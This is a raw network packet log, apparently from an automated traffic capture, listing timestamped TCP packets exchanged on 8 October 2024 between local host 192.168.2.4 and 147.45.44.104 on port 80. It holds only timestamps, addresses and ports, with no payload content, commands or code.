                                                  Oct 8, 2024 03:30:54.663757086 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.663790941 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.663800955 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.663821936 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.663856983 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.663870096 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.663894892 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.663939953 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.669291019 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.669342041 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.669384003 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.669394016 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.669455051 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.669511080 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.754132986 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.754156113 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.754173040 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.754189014 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.754317999 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.754317999 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.758899927 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.758936882 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.758970976 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.758999109 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.759008884 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.759063959 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.763711929 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.763751030 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.763788939 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.763798952 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.763825893 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.763859987 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.763873100 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.768505096 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.768529892 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.768537998 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.768546104 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.768670082 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.774183035 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.774200916 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.774214983 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.774230003 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.774239063 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.774250031 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.774296999 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.774514914 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.778904915 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.822458029 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.844543934 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.844568968 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.844588041 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.844604015 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.844669104 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.847446918 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.849214077 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.849239111 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.849256039 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.849284887 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.849379063 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.853976011 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.854012012 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.854027987 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.854044914 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.854060888 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.854064941 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.854090929 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.858691931 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.858711958 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.858738899 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.858742952 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.858757019 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.858772993 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.858787060 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.858814955 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.863477945 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.863503933 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.863521099 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.863538027 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.863553047 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.863580942 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.868340015 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.868377924 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.868393898 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.868411064 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.868427038 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.868427992 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.868455887 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.873296976 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.873322010 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.873338938 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.873356104 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.873356104 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.873374939 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.873378038 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.873393059 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.873409986 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.873414993 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.873426914 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.873444080 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.873449087 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.873461008 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.873477936 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.873485088 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.873493910 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.873511076 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.873516083 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.873550892 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.934465885 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.934500933 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.934533119 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.934550047 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.934568882 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.934571981 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.934603930 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.935177088 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.935200930 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.935218096 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.935235023 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.935237885 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.935254097 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.935261011 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.935307980 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.935496092 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.935560942 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.935614109 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.935631037 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.935642004 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.935647964 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.935683012 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.936301947 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.936319113 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.936336040 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.936353922 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.936353922 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.936369896 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.936384916 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.936398983 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.936433077 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.937298059 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.937314987 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.937330961 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.937350035 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.937350988 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.937366962 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.937383890 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.937388897 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.937414885 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.938249111 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.938265085 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.938282967 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.938301086 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.938301086 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.938318014 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.938335896 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.938343048 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.938366890 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.939265013 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.939291000 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.939308882 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.939311981 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.939327955 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.939343929 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.939361095 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.939374924 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.939407110 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.940176964 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.940193892 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.940232038 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.940234900 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.940251112 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.940269947 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.940284014 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.940287113 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.940319061 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.941143990 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.941191912 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.941389084 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.941406012 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.941423893 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.941438913 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.941454887 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.941456079 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.941473007 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.941494942 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.941525936 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.942264080 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.942626953 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.942642927 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.942660093 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.942676067 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.942676067 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.942701101 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.942712069 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.942724943 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.942742109 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.942750931 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.942759037 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.942787886 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.943552971 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.943569899 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.943588018 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.943603039 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.943633080 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.943639040 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.943656921 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.943702936 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.024528980 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.024667978 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.024684906 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.024734020 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.025125980 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.025154114 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.025168896 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.025175095 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.025216103 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.025226116 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.025243044 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.025266886 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.025283098 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.025294065 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.025331020 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026204109 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026218891 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026236057 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026252031 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026266098 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026295900 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026324034 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026392937 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026408911 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026434898 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026437044 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026453018 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026469946 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026480913 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026493073 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026520014 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026541948 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026560068 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026587009 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026587009 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026607037 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026659966 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026719093 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026736021 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026751041 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026765108 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026768923 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026787043 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026801109 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026832104 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026875019 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026890993 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026899099 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026906967 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026915073 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026923895 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026940107 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026946068 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026995897 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.027026892 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.027334929 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.027352095 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.027362108 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.027399063 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.027414083 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.027416945 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.027431965 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.027448893 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.027482986 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.028076887 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028105974 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028121948 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028155088 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.028265953 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028281927 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028297901 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028314114 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.028316975 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028350115 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.028459072 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028512001 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.028520107 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028537035 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028553963 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028584957 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.029616117 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029633045 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029649019 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029668093 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.029697895 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.029732943 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029748917 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029764891 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029772043 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029803038 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029819012 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.029819965 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029839993 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029840946 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.029856920 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029874086 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029875040 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.029891014 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029908895 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029911041 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.029948950 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.030215979 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030231953 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030247927 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030275106 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030286074 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.030286074 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.030292034 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030313015 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030329943 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030344963 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.030359030 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030369043 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.030376911 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030396938 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030420065 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.030738115 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030755043 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030772924 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030791044 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.030822992 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.030855894 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030872107 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030889034 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030904055 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030922890 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.030942917 CEST4973080192.168.2.4147.45.44.104
